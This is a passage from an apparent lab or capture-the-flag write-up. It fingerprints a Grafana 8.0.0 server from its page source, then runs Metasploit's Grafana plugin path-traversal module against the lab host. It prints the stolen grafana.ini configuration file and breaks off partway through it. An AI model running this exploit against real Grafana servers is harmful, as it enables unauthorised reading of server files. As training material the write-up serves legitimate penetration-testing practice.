c-0.1%2c1.7-0.1%2c3.5-0.1%2c5.2c0%2c0.4%2c0%2c0.9%2c0%2c1.3l0.1%2c1.4c0.1%2c0.8%2c0.1%2c1.7%2c0.2%2c2.5c0.3%2c3.5%2c1%2c6.9%2c1.9%2c10.1c1.9%2c6.5%2c4.9% -2c12.4%2c8.6%2c17.4 c3.7%2c5%2c8.2%2c9.1%2c12.9%2c12.4c4.7%2c3.2%2c9.8%2c5.5%2c14.8%2c7c5%2c1.5%2c10%2c2.1%2c14.7%2c2.1c0.6%2c0%2c1.2%2c0%2c1.7%2c0c0.3%2c0%2c0.6%2c0%2c0.9%2c0c0.3%2c0%2c0.6%2c0%2c0.9-0.1 c0.5%2 -c0%2c1-0.1%2c1.5-0.1c0.1%2c0%2c0.3%2c0%2c0.4-0.1l0.5-0.1c0.3%2c0%2c0.6-0.1%2c0.9-0.1c0.6-0.1%2c1.1-0.2%2c1.7-0.3c0.6-0.1%2c1.1-0.2%2c1.6-0.4 c1.1-0.2%2c2.1-0.6%2c3.1-0.9c2-0.7%2c4-1.5%2c5.7-2.4c1.8-0.9%2c3.4-2% -2c5-3c0.4-0.3%2c0.9-0.6%2c1.3-1c1.6-1.3%2c1.9-3.7%2c0.6-5.3 c-1.1-1.4-3.1-1.8-4.7-0.9c-0.4%2c0.2-0.8%2c0.4-1.2%2c0.6c-1.4%2c0.7-2.8%2c1.3-4.3%2c1.8c-1.5%2c0.5-3.1%2c0.9-4.7%2c1.2c-0.8%2c0.1-1.6%2c0.2-2.5%2c0.3 -c-0.4%2c0-0.8%2c0.1-1.3%2c0.1c-0.4%2c0-0.9%2c0-1.2%2c0c-0.4%2c0-0.8%2c0-1.2%2c0c-0.5%2c0-1%2c0-1.5-0.1c0%2c0-0.3%2c0-0.1%2c0l-0.2%2c0l-0.3%2c0 c-0.2%2c0-0.5%2c0-0.7-0.1c-0.5-0.1-0.9-0.1-1.4-0.2c-3.7-0.5-7.4-1.6 --10.9-3.2c-3.6-1.6-7-3.8-10.1-6.6c-3.1-2.8-5.8-6.1-7.9-9.9 c-2.1-3.8-3.6-8-4.3-12.4c-0.3-2.2-0.5-4.5-0.4-6.7c0-0.6%2c0.1-1.2%2c0.1-1.8c0%2c0.2%2c0-0.1%2c0-0.1l0-0.2l0-0.5c0-0.3%2c0.1-0.6%2c0.1-0.9 c0.1-1.2%2c0. -3-2.4%2c0.5-3.6c1.7-9.6%2c6.5-19%2c13.9-26.1c1.9-1.8%2c3.9-3.4%2c6-4.9c2.1-1.5%2c4.4-2.8%2c6.8-3.9c2.4-1.1%2c4.8-2%2c7.4-2.7 c2.5-0.7%2c5.1-1.1%2c7.8-1.4c1.3-0.1%2c2.6-0.2%2c4-0.2c0.4%2c0%2c0.6%2c0%2c0.9%2c0l1. -1%2c0l0.7%2c0c0.3%2c0%2c0%2c0%2c0.1%2c0l0.3%2c0l1.1%2c0.1 c2.9%2c0.2%2c5.7%2c0.6%2c8.5%2c1.3c5.6%2c1.2%2c11.1%2c3.3%2c16.2%2c6.1c10.2%2c5.7%2c18.9%2c14.5%2c24.2%2c25.1c2.7%2c5.3%2c4.6%2c11%2c5.5%2c16.9c0.2%2c1. -5%2c0.4%2c3%2c0.5%2c4.5 l0.1%2c1.1l0.1%2c1.1c0%2c0.4%2c0%2c0.8%2c0%2c1.1c0%2c0.4%2c0%2c0.8%2c0%2c1.1l0%2c1l0%2c1.1c0%2c0.7-0.1%2c1.9-0.1%2c2.6c-0.1%2c1.6-0.3%2c3.3-0.5%2c4.9 c-0.2%2c1.6-0.5%2c3.2-0.8%2c4.8c-0.3 -%2c1.6-0.7%2c3.2-1.1%2c4.7c-0.8%2c3.1-1.8%2c6.2-3%2c9.3c-2.4%2c6-5.6%2c11.8-9.4%2c17.1 c-7.7%2c10.6-18.2%2c19.2-30.2%2c24.7c-6%2c2.7-12.3%2c4.7-18.8%2c5.7c-3.2%2c0.6-6.5%2c0.9-9.8%2c1l-0.6%2c0l-0.5%2c0l-1.1%2c0 -l-1.6%2c0l-0.8%2c0 c0.4%2c0-0.1%2c0-0.1%2c0l-0.3%2c0c-1.8%2c0-3.5-0.1-5.3-0.3c-7-0.5-13.9-1.8-20.7-3.7c-6.7-1.9-13.2-4.6-19.4-7.8 c-12.3-6.6-23.4-15.6-32-26.5c-4.3-5.4-8.1-11.3-11.2-17.4c-3.1-6.1-5.6-12.6-7.4-1 -9.1c-1.8-6.6-2.9-13.3-3.4-20.1l-0.1-1.3l0-0.3 l0-0.3l0-0.6l0-1.1l0-0.3l0-0.4l0-0.8l0-1.6l0-0.3c0%2c0%2c0%2c0.1%2c0-0.1l0-0.6c0-0.8%2c0-1.7%2c0-2.5c0.1-3.3%2c0.4-6.8%2c0.8-10.2 c0.4-3.4%2c1-6.9%2c1.7-10.3c0.7-3. -4%2c1.5-6.8%2c2.5-10.2c1.9-6.7%2c4.3-13.2%2c7.1-19.3c5.7-12.2%2c13.1-23.1%2c22-31.8c2.2-2.2%2c4.5-4.2%2c6.9-6.2 c2.4-1.9%2c4.9-3.7%2c7.5-5.4c2.5-1.7%2c5.2-3.2%2c7.9-4.6c1.3-0.7%2c2.7-1.4%2c4.1-2c0.7-0.3%2c1.4-0 -.6%2c2.1-0.9c0.7-0.3%2c1.4-0.6%2c2.1-0.9 c2.8-1.2%2c5.7-2.2%2c8.7-3.1c0.7-0.2%2c1.5-0.4%2c2.2-0.7c0.7-0.2%2c1.5-0.4%2c2.2-0.6c1.5-0.4%2c3-0.8%2c4.5-1.1c0.7-0.2%2c1.5-0.3%2c2.3-0.5 c0.8-0.2%2c1.5-0.3%2c2.3-0.5c0 -.8-0.1%2c1.5-0.3%2c2.3-0.4l1.1-0.2l1.2-0.2c0.8-0.1%2c1.5-0.2%2c2.3-0.3c0.9-0.1%2c1.7-0.2%2c2.6-0.3 c0.7-0.1%2c1.9-0.2%2c2.6-0.3c0.5-0.1%2c1.1-0.1%2c1.6-0.2l1.1-0.1l0.5-0.1l0.6%2c0c0.9-0.1%2c1.7-0.1%2c2.6-0.2l1. -3-0.1c0%2c0%2c0.5%2c0%2c0.1%2c0l0.3%2c0 l0.6%2c0c0.7%2c0%2c1.5-0.1%2c2.2-0.1c2.9-0.1%2c5.9-0.1%2c8.8%2c0c5.8%2c0.2%2c11.5%2c0.9%2c17%2c1.9c11.1%2c2.1%2c21.5%2c5.6%2c31%2c10.3 c9.5%2c4.6%2c17.9%2c10.3%2c25.3%2c1 -6.5c0.5%2c0.4%2c0.9%2c0.8%2c1.4%2c1.2c0.4%2c0.4%2c0.9%2c0.8%2c1.3%2c1.2c0.9%2c0.8%2c1.7%2c1.6%2c2.6%2c2.4c0.9%2c0.8%2c1.7%2c1.6%2c2.5%2c2.4 c0.8%2c0.8%2c1.6%2c1.6%2c2.4%2c2.5c3.1%2c3.3%2c6%2c6.6%2c8.6%2c10c5.2% -2c6.7%2c9.4%2c13.5%2c12.7%2c19.9c0.2%2c0.4%2c0.4%2c0.8%2c0.6%2c1.2c0.2%2c0.4%2c0.4%2c0.8%2c0.6%2c1.2 c0.4%2c0.8%2c0.8%2c1.6%2c1.1%2c2.4c0.4%2c0.8%2c0.7%2c1.5%2c1.1%2c2.3c0.3%2c0.8%2c0.7%2c1.5%2c1%2c2.3c1.2%2c3% -2c2.4%2c5.9%2c3.3%2c8.6c1.5%2c4.4%2c2.6%2c8.3%2c3.5%2c11.7 c0.3%2c1.4%2c1.6%2c2.3%2c3%2c2.1c1.5-0.1%2c2.6-1.3%2c2.6-2.8C342.6%2c170.4%2c342.5%2c166.1%2c342%2c161.2z'/%3e %3c/svg%3e"); -     
Loading Grafana
-         If you're seeing this Grafana has failed to load its application files -         2. If you host grafana under subpath make sure your grafana.ini root_url setting includes subpath. If not -         3. Sometimes restarting grafana-server can help
-          -         var isEdgeVersion = /Edge\/([0-9.]+)/.exec(navigator.userAgent); -           ((isEdgeVersion && parseFloat(isEdgeVersion[1]) <= 16) || -         alert('Your browser is not fully supported, please try newer version.'); -       window.grafanaBootData = { -         user: {"isSignedIn":false,"id":0,"login":"","email":"","name":"","lightTheme":false,"orgCount":0,"orgId":0,"orgName":"","orgRole":"","isGrafanaAdmin":false,"gravatarUrl":"","timezone":"browser","local -e":"en-US","helpFlags1":0,"hasEditPermissionInFolders":false}, -         settings: {"alertingEnabled":true,"alertingErrorOrTimeout":"alerting","alertingMinInterval":1,"alertingNoDataOrNullValues":"no_data","allowOrgCreate":false,"appSubUrl":"","appUrl":"http://localhost:30 -00/","authProxyEnabled":false,"autoAssignOrg":true,"awsAllowedAuthProviders":["default","keys","credentials"],"awsAssumeRoleEnabled":true,"azure":{"cloud":"AzureCloud","managedIdentityEnabled":false},"buildInfo -":{"buildstamp":1623132323,"commit":"41f0542c1e","edition":"Open Source","env":"production","hasUpdate":false,"hideVersion":false,"isEnterprise":false,"latestVersion":"","version":"8.0.0"},"caching":{"enabled": -true},"datasources":{"-- Dashboard --":{"meta":{"type":"datasource","name":"-- Dashboard --","id":"dashboard","info":{"author":{"name":"","url":""},"description":"","links":null,"logos":{"small":"public/img/icn --datasource.svg","large":"public/img/icn-datasource.svg"},"build":{},"screenshots":null,"version":"","updated":""},"dependencies":{"grafanaVersion":"*","plugins":[]},"includes":null,"module":"app/plugins/dataso -urce/dashboard/module","baseUrl":"public/app/plugins/datasource/dashboard","category":"","preload":false,"signature":"internal","Root":null,"annotations":false,"metrics":true,"alerting":false,"explore":false,"t -ables":false,"logs":false,"tracing":false,"builtIn":true,"routes":null,"streaming":false},"name":"-- Dashboard --","type":"datasource"},"-- Grafana --":{"meta":{"type":"datasource","name":"-- Grafana --","id":" -grafana","info":{"author":{"name":"","url":""},"description":"","links":null,"logos":{"small":"public/img/icn-datasource.svg","large":"public/img/icn-datasource.svg"},"build":{},"screenshots":null,"version":"", -"updated":""},"dependencies":{"grafanaVersion":"*","plugins":[]},"includes":null,"module":"app/plugins/datasource/grafana/module","baseUrl":"public/app/plugins/datasource/grafana","category":"","preload":false, -"signature":"internal","Root":null,"annotations":true,"metrics":true,"alerting":false,"explore":false,"tables":false,"logs":false,"tracing":false,"builtIn":true,"routes":null,"streaming":false},"name":"-- Grafa -na --","type":"datasource"},"-- Mixed --":{"meta":{"type":"datasource","name":"-- Mixed --","id":"mixed","info":{"author":{"name":"","url":""},"description":"","links":null,"logos":{"small":"public/img/icn-data -source.svg","large":"public/img/icn-datasource.svg"},"build":{},"screenshots":null,"version":"","updated":""},"dependencies":{"grafanaVersion":"*","plugins":[]},"includes":null,"module":"app/plugins/datasource/ -mixed/module","baseUrl":"public/app/plugins/datasource/mixed","category":"","preload":false,"signature":"internal","Root":null,"annotations":false,"metrics":true,"alerting":false,"explore":false,"tables":false, -"logs":false,"tracing":false,"queryOptions":{"minInterval":true},"builtIn":true,"mixed":true,"routes":null,"streaming":false},"name":"-- Mixed --","type":"datasource"}},"dateFormats":{"fullDate":"YYYY-MM-DD HH: -mm:ss","useBrowserLocale":false,"interval":{"second":"HH:mm:ss","minute":"HH:mm","hour":"MM/DD HH:mm","day":"MM/DD","month":"YYYY-MM","year":"YYYY"},"defaultTimezone":"browser"},"defaultDatasource":"-- Grafana ---","disableLoginForm":false,"disableSanitizeHtml":false,"disableUserSignUp":true,"editorsCanAdmin":false,"exploreEnabled":true,"expressionsEnabled":true,"externalUserMngInfo":"","externalUserMngLinkName":"","e -xternalUserMngLinkUrl":"","featureToggles":{},"googleAnalyticsId":"","http2Enabled":false,"ldapEnabled":false,"licenseInfo":{"edition":"Open Source","expiry":0,"hasLicense":false,"hasValidLicense":false,"licens -eUrl":"https://grafana.com/products/enterprise/?utm_source=grafana_footer","stateInfo":""},"liveEnabled":true,"loginHint":"email or username","minRefreshInterval":"5s","oauth":{},"panels":{"alertlist":{"baseUrl -":"public/app/plugins/panel/alertlist","hideFromList":false,"id":"alertlist","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Shows list of alerts and their current status","l -inks":null,"logos":{"small":"public/app/plugins/panel/alertlist/img/icn-singlestat-panel.svg","large":"public/app/plugins/panel/alertlist/img/icn-singlestat-panel.svg"},"build":{},"screenshots":null,"version":" -","updated":""},"module":"app/plugins/panel/alertlist/module","name":"Alert list","signature":"internal","skipDataQuery":true,"sort":15,"state":""},"barchart":{"baseUrl":"public/app/plugins/panel/barchart","hid -eFromList":false,"id":"barchart","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Categorical charts with group support","links":null,"logos":{"small":"public/app/plugins/pane -l/barchart/img/barchart.svg","large":"public/app/plugins/panel/barchart/img/barchart.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/barchart/module","name":"Bar chart -","signature":"internal","skipDataQuery":false,"sort":2,"state":"beta"},"bargauge":{"baseUrl":"public/app/plugins/panel/bargauge","hideFromList":false,"id":"bargauge","info":{"author":{"name":"Grafana Labs","ur -l":"https://grafana.com"},"description":"Horizontal and vertical gauges","links":null,"logos":{"small":"public/app/plugins/panel/bargauge/img/icon_bar_gauge.svg","large":"public/app/plugins/panel/bargauge/img/i -con_bar_gauge.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/bargauge/module","name":"Bar gauge","signature":"internal","skipDataQuery":false,"sort":5,"state":""},"da -shlist":{"baseUrl":"public/app/plugins/panel/dashlist","hideFromList":false,"id":"dashlist","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"List of dynamic links to other das -hboards","links":null,"logos":{"small":"public/app/plugins/panel/dashlist/img/icn-dashlist-panel.svg","large":"public/app/plugins/panel/dashlist/img/icn-dashlist-panel.svg"},"build":{},"screenshots":null,"versi -on":"","updated":""},"module":"app/plugins/panel/dashlist/module","name":"Dashboard list","signature":"internal","skipDataQuery":true,"sort":16,"state":""},"gauge":{"baseUrl":"public/app/plugins/panel/gauge","h -ideFromList":false,"id":"gauge","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Standard gauge visualization","links":null,"logos":{"small":"public/app/plugins/panel/gauge/im -g/icon_gauge.svg","large":"public/app/plugins/panel/gauge/img/icon_gauge.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/gauge/module","name":"Gauge","signature":"inte -rnal","skipDataQuery":false,"sort":4,"state":""},"gettingstarted":{"baseUrl":"public/app/plugins/panel/gettingstarted","hideFromList":true,"id":"gettingstarted","info":{"author":{"name":"Grafana Labs","url":"ht -tps://grafana.com"},"description":"","links":null,"logos":{"small":"public/app/plugins/panel/gettingstarted/img/icn-dashlist-panel.svg","large":"public/app/plugins/panel/gettingstarted/img/icn-dashlist-panel.sv -g"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/gettingstarted/module","name":"Getting Started","signature":"internal","skipDataQuery":true,"sort":100,"state":""},"graph -":{"baseUrl":"public/app/plugins/panel/graph","hideFromList":false,"id":"graph","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"The old default graph panel","links":null,"log -os":{"small":"public/app/plugins/panel/graph/img/icn-graph-panel.svg","large":"public/app/plugins/panel/graph/img/icn-graph-panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plu -gins/panel/graph/module","name":"Graph (old)","signature":"internal","skipDataQuery":false,"sort":13,"state":""},"heatmap":{"baseUrl":"public/app/plugins/panel/heatmap","hideFromList":false,"id":"heatmap","info -":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Like a histogram over time","links":[{"name":"Brendan Gregg - Heatmaps","url":"http://www.brendangregg.com/heatmaps.html"},{"name": -"Brendan Gregg - Latency Heatmaps","url":" http://www.brendangregg.com/HeatMaps/latency.html"}],"logos":{"small":"public/app/plugins/panel/heatmap/img/icn-heatmap-panel.svg","large":"public/app/plugins/panel/he -atmap/img/icn-heatmap-panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/heatmap/module","name":"Heatmap","signature":"internal","skipDataQuery":false,"sort":10,"st -ate":""},"histogram":{"baseUrl":"public/app/plugins/panel/histogram","hideFromList":false,"id":"histogram","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"","links":null,"log -os":{"small":"public/app/plugins/panel/histogram/img/histogram.svg","large":"public/app/plugins/panel/histogram/img/histogram.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins -/panel/histogram/module","name":"Histogram","signature":"internal","skipDataQuery":false,"sort":12,"state":"beta"},"logs":{"baseUrl":"public/app/plugins/panel/logs","hideFromList":false,"id":"logs","info":{"aut -hor":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"","links":null,"logos":{"small":"public/app/plugins/panel/logs/img/icn-logs-panel.svg","large":"public/app/plugins/panel/logs/img/icn-logs --panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/logs/module","name":"Logs","signature":"internal","skipDataQuery":false,"sort":100,"state":""},"news":{"baseUrl" -:"public/app/plugins/panel/news","hideFromList":false,"id":"news","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"RSS feed reader","links":null,"logos":{"small":"public/app/p -lugins/panel/news/img/news.svg","large":"public/app/plugins/panel/news/img/news.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/news/module","name":"News","signature": -"internal","skipDataQuery":true,"sort":17,"state":"beta"},"nodeGraph":{"baseUrl":"public/app/plugins/panel/nodeGraph","hideFromList":false,"id":"nodeGraph","info":{"author":{"name":"Grafana Labs","url":"https:/ -/grafana.com"},"description":"","links":null,"logos":{"small":"public/app/plugins/panel/nodeGraph/img/icn-node-graph.svg","large":"public/app/plugins/panel/nodeGraph/img/icn-node-graph.svg"},"build":{},"screens -hots":null,"version":"","updated":""},"module":"app/plugins/panel/nodeGraph/module","name":"Node Graph","signature":"internal","skipDataQuery":false,"sort":100,"state":"beta"},"piechart":{"baseUrl":"public/app/ -plugins/panel/piechart","hideFromList":false,"id":"piechart","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"The new core pie chart visualization","links":null,"logos":{"smal -l":"public/app/plugins/panel/piechart/img/icon_piechart.svg","large":"public/app/plugins/panel/piechart/img/icon_piechart.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/pan -el/piechart/module","name":"Pie chart","signature":"internal","skipDataQuery":false,"sort":8,"state":""},"pluginlist":{"baseUrl":"public/app/plugins/panel/pluginlist","hideFromList":false,"id":"pluginlist","inf -o":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Plugin List for Grafana","links":null,"logos":{"small":"public/app/plugins/panel/pluginlist/img/icn-dashlist-panel.svg","large":"p -ublic/app/plugins/panel/pluginlist/img/icn-dashlist-panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/pluginlist/module","name":"Plugin list","signature":"internal -","skipDataQuery":true,"sort":100,"state":""},"stat":{"baseUrl":"public/app/plugins/panel/stat","hideFromList":false,"id":"stat","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description -":"Big stat values \u0026 sparklines","links":null,"logos":{"small":"public/app/plugins/panel/stat/img/icn-singlestat-panel.svg","large":"public/app/plugins/panel/stat/img/icn-singlestat-panel.svg"},"build":{}, -"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/stat/module","name":"Stat","signature":"internal","skipDataQuery":false,"sort":3,"state":""},"state-timeline":{"baseUrl":"public/app/plu -gins/panel/state-timeline","hideFromList":false,"id":"state-timeline","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"State changes and durations","links":null,"logos":{"smal -l":"public/app/plugins/panel/state-timeline/img/timeline.svg","large":"public/app/plugins/panel/state-timeline/img/timeline.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/p -anel/state-timeline/module","name":"State timeline","signature":"internal","skipDataQuery":false,"sort":9,"state":"beta"},"status-history":{"baseUrl":"public/app/plugins/panel/status-history","hideFromList":fal -se,"id":"status-history","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Periodic status history","links":null,"logos":{"small":"public/app/plugins/panel/status-history/img/s -tatus.svg","large":"public/app/plugins/panel/status-history/img/status.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/status-history/module","name":"Status history"," -signature":"internal","skipDataQuery":false,"sort":11,"state":"beta"},"table":{"baseUrl":"public/app/plugins/panel/table","hideFromList":false,"id":"table","info":{"author":{"name":"Grafana Labs","url":"https:/ -/grafana.com"},"description":"Supports many column styles","links":null,"logos":{"small":"public/app/plugins/panel/table/img/icn-table-panel.svg","large":"public/app/plugins/panel/table/img/icn-table-panel.svg" -},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/table/module","name":"Table","signature":"internal","skipDataQuery":false,"sort":6,"state":""},"table-old":{"baseUrl":"publ -ic/app/plugins/panel/table-old","hideFromList":false,"id":"table-old","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Table Panel for Grafana","links":null,"logos":{"small":" -public/app/plugins/panel/table-old/img/icn-table-panel.svg","large":"public/app/plugins/panel/table-old/img/icn-table-panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/p -anel/table-old/module","name":"Table (old)","signature":"internal","skipDataQuery":false,"sort":100,"state":"deprecated"},"text":{"baseUrl":"public/app/plugins/panel/text","hideFromList":false,"id":"text","info -":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Supports markdown and html content","links":null,"logos":{"small":"public/app/plugins/panel/text/img/icn-text-panel.svg","large":"p -ublic/app/plugins/panel/text/img/icn-text-panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/text/module","name":"Text","signature":"internal","skipDataQuery":true, -"sort":14,"state":""},"timeseries":{"baseUrl":"public/app/plugins/panel/timeseries","hideFromList":false,"id":"timeseries","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"Tim -e based line, area and bar charts","links":null,"logos":{"small":"public/app/plugins/panel/timeseries/img/icn-timeseries-panel.svg","large":"public/app/plugins/panel/timeseries/img/icn-timeseries-panel.svg"},"b -uild":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/timeseries/module","name":"Time series","signature":"internal","skipDataQuery":false,"sort":1,"state":""},"welcome":{"baseUrl": -"public/app/plugins/panel/welcome","hideFromList":true,"id":"welcome","info":{"author":{"name":"Grafana Labs","url":"https://grafana.com"},"description":"","links":null,"logos":{"small":"public/app/plugins/pane -l/welcome/img/icn-dashlist-panel.svg","large":"public/app/plugins/panel/welcome/img/icn-dashlist-panel.svg"},"build":{},"screenshots":null,"version":"","updated":""},"module":"app/plugins/panel/welcome/module", -"name":"Welcome","signature":"internal","skipDataQuery":true,"sort":100,"state":""}},"passwordHint":"password","pluginAdminEnabled":false,"pluginAdminExternalManageEnabled":false,"pluginCatalogURL":"https://gra -fana.com/grafana/plugins/","pluginsToPreload":[],"rendererAvailable":false,"rendererVersion":"","samlEnabled":false,"sentry":{"enabled":false,"dsn":"","customEndpoint":"/log","sampleRate":1},"sigV4AuthEnabled": -false,"verifyEmailEnabled":false,"viewersCanEdit":false}, -         navTree: [{"id":"dashboards","text":"Dashboards","subTitle":"Manage dashboards and folders","icon":"apps","url":"/","sortWeight":-1900,"children":[{"id":"home","text":"Home","icon":"home-alt","url":"/ -","hideFromTabs":true},{"id":"divider","text":"Divider","divider":true,"hideFromTabs":true},{"id":"manage-dashboards","text":"Manage","icon":"sitemap","url":"/dashboards"},{"id":"playlists","text":"Playlists"," -icon":"presentation-play","url":"/playlists"}]},{"id":"alerting","text":"Alerting","subTitle":"Alert rules and notifications","icon":"bell","url":"/alerting/list","sortWeight":-1600,"children":[{"id":"alert-lis -t","text":"Alert rules","icon":"list-ul","url":"/alerting/list"}]},{"id":"help","text":"Help","subTitle":"Grafana v8.0.0 (41f0542c1e)","icon":"question-circle","url":"#","sortWeight":-1200,"hideFromMenu":true}] -, -           light: 'public/build/grafana.light.08d1221db5b53eadbfe4.css', -           dark: 'public/build/grafana.dark.08d1221db5b53eadbfe4.css' -``` - -Luckily for me, I didn't have to read the whole file, because the version was at the very end : `"subTitle":"Grafana v8.0.0` - -```bash ->  msfconsole -q -msf > search Grafana - -Matching Modules -================ - -  #  Name                                             Disclosure Date  Rank    Check  Description -  -  ----                                             ---------------  ----    -----  ----------- -  0  auxiliary/admin/http/grafana_auth_bypass         2019-08-14       normal  No     Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth -  1  auxiliary/scanner/http/grafana_plugin_traversal  2021-12-02       normal  No     Grafana Plugin Path Traversal - - -Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/grafana_plugin_traversal -``` - -0 can't be used since it goes from 2.0 through 5.2.2 and the version here is 8.0.0, we will try `auxiliary/scanner/http/grafana_plugin_traversal` . - -```bash -msf > use 1 -msf auxiliary(scanner/http/grafana_plugin_traversal) > check -[-] Msf::OptionValidateError One or more options failed to validate: RHOSTS. -msf auxiliary(scanner/http/grafana_plugin_traversal) > set RHOSTS 10.129.234.47 -RHOSTS => 10.129.234.47 -msf auxiliary(scanner/http/grafana_plugin_traversal) > check -[-] This module does not support check. -msf auxiliary(scanner/http/grafana_plugin_traversal) > set LHOST 10.10.14.12 -[!] Unknown datastore option: LHOST. Did you mean VHOST? -LHOST => 10.10.14.12 -msf auxiliary(scanner/http/grafana_plugin_traversal) > set RPORT 3000 -RPORT => 3000 -msf auxiliary(scanner/http/grafana_plugin_traversal) > run -[+] Detected vulnerable Grafana: 8.0.0 -[*] 10.129.234.47 - Progress   0/40 (0.0%) -[+] alertlist was found and exploited successfully -[+] 10.129.234.47:3000 - File saved in: /home/vagabond/.msf4/loot/20260521100133_default_10.129.234.47_grafana.loot_989095.ini -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed -``` - -Then we read the file : - -```bash ->  cat  /home/vagabond/.msf4/loot/20260521100133_default_10.129.234.47_grafana.loot_989095.ini - -##################### Grafana Configuration Example ##################### -# -# Everything has defaults so you only need to uncomment things you want to -# change - -# possible values : production, development -;app_mode = production - -# instance name, defaults to HOSTNAME environment variable value or hostname if HOSTNAME var is empty -;instance_name = ${HOSTNAME} - -#################################### Paths #################################### -[paths] -# Path to where grafana can store temp files, sessions, and the sqlite3 db (if that is used) -;data = /var/lib/grafana - -# Temporary files in `data` directory older than given duration will be removed -;temp_data_lifetime = 24h - -# Directory where grafana can store logs -;logs = /var/log/grafana - -# Directory where grafana will automatically scan and look for plugins -;plugins = /var/lib/grafana/plugins - -# folder that contains provisioning config files that grafana will apply on startup and while running. -;provisioning = conf/provisioning - -#################################### Server #################################### -[server] -# Protocol (http, https, h2, socket) -;protocol = http - -# The ip address to bind to, empty will bind to all interfaces -;http_addr = - -# The http port  to use -;http_port = 3000 - -# The public facing domain name used to access grafana from a browser -;domain = localhost - -# Redirect to correct domain if host header does not match domain -# Prevents DNS rebinding attacks -;enforce_domain = false - -# The full public facing url you use in browser, used for redirects and emails -# If you use reverse proxy and sub path specify full url (with sub path) -;root_url = %(protocol)s://%(domain)s:%(http_port)s/ - -# Serve Grafana from subpath specified in `root_url` setting. By default it is set to `false` for compatibility reasons. -;serve_from_sub_path = false - -# Log web requests -;router_logging = false - -# the path relative working path -;static_root_path = public - -# enable gzip -;enable_gzip = false - -# https certs & key file -;cert_file = -;cert_key = - -# Unix socket path -;socket = - -# CDN Url -;cdn_url = - -# Sets the maximum time using a duration format (5s/5m/5ms) before timing out read of an incoming request and closing idle connections. -# `0` means there is no timeout for reading the request. -;read_timeout = 0 - -#################################### Database #################################### -[database] -# You can configure the database connection by specifying type, host, name, user and password -# as separate properties or as on string using the url properties. - -# Either "mysql", "postgres" or "sqlite3", it's your choice -;type = sqlite3 -;host = 127.0.0.1:3306 -;name = grafana -;user = root -# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;""" -;password = - -# Use either URL or the previous fields to configure the database -# Example: mysql://user:secret@host:port/database -;url = - -# For "postgres" only, either "disable", "require" or "verify-full" -;ssl_mode = disable - -# Database drivers may support different transaction isolation levels. -# Currently, only "mysql" driver supports isolation levels. -# If the value is empty - driver's default isolation level is applied. -# For "mysql" use "READ-UNCOMMITTED", "READ-COMMITTED", "REPEATABLE-READ" or "SERIALIZABLE". -;isolation_level = - -;ca_cert_path = -;client_key_path = -;client_cert_path = -;server_cert_name = - -# For "sqlite3" only, path relative to data_path setting -;path = grafana.db - -# Max idle conn setting default is 2 -;max_idle_conn = 2 - -# Max conn setting default is 0 (mean not set) -;max_open_conn = - -# Connection Max Lifetime default is 14400 (means 14400 seconds or 4 hours) -;conn_max_lifetime = 14400 - -# Set to true to log the sql calls and execution times. -;log_queries = - -# For "sqlite3" only. cache mode setting used for connecting to the database. (private, shared) -;cache_mode = private - -################################### Data sources ######################### -[datasources] -# Upper limit of data sources that Grafana will return. This limit is a temporary configuration and it will be deprecated when pagination will be introduced on the list data sources API. -;datasource_limit = 5000 - -#################################### Cache server ############################# -[remote_cache] -# Either "redis", "memcached" or "database" default is "database" -;type = database - -# cache connectionstring options -# database: will use Grafana primary database. -# redis: config like redis server e.g. `addr=127.0.0.1:6379,pool_size=100,db=0,ssl=false`. Only addr is required. ssl may be 'true', 'false', or 'insecure'. -# memcache: 127.0.0.1:11211 -;connstr = - -#################################### Data proxy ########################### -[dataproxy] - -# This enables data proxy logging, default is false -;logging = false - -# How long the data proxy waits to read the headers of the response before timing out, default is 30 seconds. -# This setting also applies to core backend HTTP data sources where query requests use an HTTP client with timeout set. -;timeout = 30 - -# How long the data proxy waits to establish a TCP connection before timing out, default is 10 seconds. -;dialTimeout = 10 - -# How many seconds the data proxy waits before sending a keepalive probe request. 